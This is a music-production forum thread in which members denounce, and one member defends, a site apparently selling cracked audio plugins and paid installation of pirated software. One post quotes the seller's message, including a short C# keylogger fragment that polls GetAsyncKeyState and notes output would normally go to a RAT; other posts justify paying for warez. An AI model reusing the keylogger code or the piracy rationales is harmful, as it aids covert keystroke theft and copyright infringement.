beware: *spam* dot com & vstplug dot is scam, selling warez

Discussion in 'Internet for Musician' started by maxthemusic, Apr 5, 2024.

  1. jhagen

    jhagen Platinum Record

    Apr 9, 2013
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    For those in needs it can even works on Windows 7 systems


    Soon or later it will cost another host file hack drama to the whole community, thanks a lot Gen Z businessman.
  2. Obineg

    Obineg Platinum Record

    Dec 7, 2020
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    someone who sells software including scene keygen or crack and then claims he would do this for steinberg obviously has serious health issues.

    which part of "dont post such links" was too difficult to understand?
  3. Talula

    Talula Rock Star

    Apr 22, 2018
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    what does this site and the owners of this site have to do with this fact? none. all the work was done by other people and not for anyone to make money from it.

    the only feelings I have towards those people who pay money for pirated software on sites like this are a little sympathy, a little pity and a lot of contempt... :(
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  4. jhagen

    jhagen Platinum Record

    Apr 9, 2013
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    I didn't know C13 VR working on win 7.

    It's even worse if you think it's done by Gen Z tiktok rampant businessman dreaming for a supercar to show their friends how cool they are.
  5. xorome

    xorome Audiosexual

    Sep 28, 2021
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    "Remote installation business for pirated software" is up there with "former gang member who ran chat groups for monkey torture enthusiasts" for most "what the fuck did I just read" thing of the past 6 months.
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  6. muciones

    muciones Kapellmeister

    May 11, 2015
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    File hosters also compensate the proprietors of download links from sister or brother or cousin sites. :winker:
    So, let us stop the nonsense and hypocrisy about selling or not selling warez.
    Yes, there are no prices or shopping carts, yet money is produced every time you complete a download or utilize an affiliate link to purchase premium files from multiple file hosts.
  7. Citrik Acid

    Citrik Acid Rock Star

    Feb 7, 2016
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    Me: Did you know they are selling cracked software

    Him: Did you know they know. [​IMG]
    They buy an install service mate and software they know is safe. they also buy from a producer like themselves and not a nigerian scammer who threw together a WIX website to scam people.
    They pay for our services Because the Shit they can download for free comes with the added bonus of a nice keylogger and a RAT Suspiciously hidden in the ASCII of the keygens and often BAT files and difficult installation methods that we have been making safer and easier to install for our customers for over 15 years.
    Keyloggers and RATs that avast and mcaffe dont spot because its just a bit of ASCII
    The software we provide we scan and upload to our own server ourselves using software you wouldnt know about unless you knew C++ and how to use console software ( Shell ) and software provided with OS such as Parrot OS and Kali linux.
    And most people dont know how to use kali linux, shell or C++ and they go ahead and install the junk being given to you for free so you install that keylogger and hand over a backdoor to the crackers and hackers that injecterd the software your downloading for free.
    As well as difficult installs for Macs and protools software, we at *spam* provide a service regular people need because they know of the dangers download crap for free off google.
    Why it bothers people like you reveals 1 thing about people like you
    Do You know what that is mate ?
    here is an example of a keylogger that YOU and our customers wont find hidden in your FREE products you blindley download and install.
    public static extern int GetAsyncKeyState(Int32 i);
    static void Main(string[] args)
    while (true)
    for (int i = 0; i < 255; i++)
    int keyState = GetAsyncKeyState(i);
    // 32769 should be used for windows 10.
    if (keyState == 1 || keyState == -32767 || keyState == 32769)
    Console.WriteLine((char)i); - ( normally JSON sent to RAT )

    Sorry for the big text this an conversation I had with somebody on their group.
    Last edited: Apr 17, 2024

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  8. Citrik Acid

    Citrik Acid Rock Star

    Feb 7, 2016
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    So funny
    Capture d’écran (7).png
  9. 5xq

    5xq Ultrasonic

    Nov 2, 2019
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    Good Luck.
  10. mysterdee888

    mysterdee888 Banned

    Jul 13, 2021
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    Whats funny is how the guy made you look like a Dick ? and the responces from his community that made you look like a dick too.

    The community are apprciative of his services, its no different that jogging off round your pals for a blaze while he ammends the mess you made installing the shit you downloaded from a torrent site and destroyed your DAW.

    Thats why people use his website, They "Appreciate" the service he provides that nobody else will.
    Its a Closed Community with a VIP area for Members.

    Moreover Like Minded Members who appreciate what the website does for them..

    A service, Ebay, Etsy , Facebook, Amazon, Fiver And all the other Thrown together websites Dont offer when they sell you CRACKS and SHIT they download off torrent sites.

    The Guy uses the software himself and uploads when hes tried tested and cleaned the software of the Shite being rammed down your throat for free everyday.

    Besides Distributing ( Illegally ) you want to talk about the Law and pirated software, websites like this and the others are Distributing ILLEGAL AND DANGEROUS products that alot of people struggle to installl and they end up damaging thier DAW and worse thier Computers, All you have to say about that is that they should know how to install it. Well thats why people use the services of websites like the 1 mentioned.

    You have nothing to say about Illegally distributed and dangerous software Yet you have a problem with a website that provides a solution to that problem.

    For me and the 5K Members of the website, we are happy to use the services and we benefit from those services knowing what we are buying. An Installation service more than anything and 1 to 1 communication and support with another producer who has alot of experience.

    And the software provided is alot safer after his inspections ,repacking and reuploading than Illegal and dangerous downloads being distributed on forums, torrents websitess, Wix websites and Other naferious distributors.

    The website has users & followers for a reason... They appreciate the service provided weather you do or not. They are not Duped or misguided, they all know what they are buying and they return for more because they receive alot more than they pay for and expected overall.

    Unfortunatly for you Misguided Ego strokers, its the 21st century and such websites exist and always will. Thankfully a genuine 1 also exists, and overall weather you like to admit it or not they are a safer option with better support than blindely downloading shite of google , forums and torrents websites.

    Moral of the story is ... If You want to open a convosation based on your misguided , unexperienced and undereducated opinion, expect others to dissagree with your Spite as they have done.

    Theres plenty of forums out thier blasting websites like this one for a far more valid reason.

    Its a FREE world, learn to live in it and you might benefit from it too.
    Last edited: Apr 22, 2024
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  11. Zoketula

    Zoketula Guest

    you think you can fool anyone with your gaslighting bullshit.
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  12. SAiNT

    SAiNT Creator Staff Member phonometrograph

    May 11, 2011
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    Your warning level has been increased on 2 point for insulting other members :dont:
  13. Djord Emer

    Djord Emer Audiosexual

    Sep 12, 2021
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    The amount of mental juggling and logical fallacies you go about to justify this business is something straight out a 50s cigarrete advertisement.
    Last edited: Apr 22, 2024
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  14. Lad Impala

    Lad Impala Rock Star

    Feb 5, 2024
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    In bloom
    @mysterdee888 a friendly advice, just drop it. forget about this tread and go do something else :)
  15. clone

    clone Audiosexual

    Feb 5, 2021
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    Maybe if they were trying to sell them in packs while standing in front of a tobacco farm. They could include a free lighter with every purchase.
  16. FrankWhite23

    FrankWhite23 Producer

    May 1, 2019
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    You know it's not actually ebay or Amazon that's actually doing it.. it's morons that join the site and try and sell cracks on there.. so don't say it like it's the company that's doing it.. you could technically sell CP on there .. does it make ir right? Your logic is flawed and you sound stupid.. quit while your ahead
  17. mftzy

    mftzy Newbie

    Nov 22, 2018
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    cmonnn @mysterdee make it one more, or you could make it one more time by shot it out of the box and make it three point!
  18. Citrik Acid

    Citrik Acid Rock Star

    Feb 7, 2016
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    No the world is not free, it's a lie, somethings are free but not all.
    And yes is funny to read and troll fanboys like you.
    And: They are a safer option with better support than blindely downloading shite of google , forums and torrents websites.
    Please don't take your case for a generality!
    If you are not aware where to download good and reliable pirated stuff 100% for free, it's your problem.
    You know I don't need to pay for cracked software, and never have problems within what I download, because I'm careful.
    Theres plenty of forums out thier blasting websites like this one for a far more valid reason: Yes because some people in a sense are smart to make money on dumb and lazy people.
  19. Garamondo Furbish

    Garamondo Furbish Audiosexual

    Nov 13, 2023
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    North America
    Pirates without morals, what is the world coming to?
    Someone has to help people that can't find their dicks with a string tied to it.
    and he makes money and gets his ego stroked and you know steve jobs started out selling whistles that could phonephreak long distance relay banks so you could get free long distance calls.
    also stole CPUs from hewett packard i beleive when he worked there or so the story goes.

    yeah the blackmarkets are dodgy, but there's always an audience looking for something through back channels.

    eventually they'll realize it aint software its talent and you can't download or hack that...'

    im not condoning their actions, rather the opposite, but imagine the dumbest person you know, now remember 50% of the world is even stupider. Stupidity is the only infinite resource in the universe. so they reap the wind.
  20. toetea

    toetea Producer

    Dec 3, 2023
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    making some toe tea
    Yes I could learn to live in this free world...
    I wish I could get free for free but I guess I will pay money for the free instead? :disco: :hifive::hahaha:
    If you are spending money on these tools and materials then give it to the actual developer or creator.
    If you do not want to do that then you can just flush your money down the toilet.
    Though everybody has to make money somehow I guess... :bash:
    No need for us though, we have the self-igniting kind. :chilling: Just flick it on a surface like a match.
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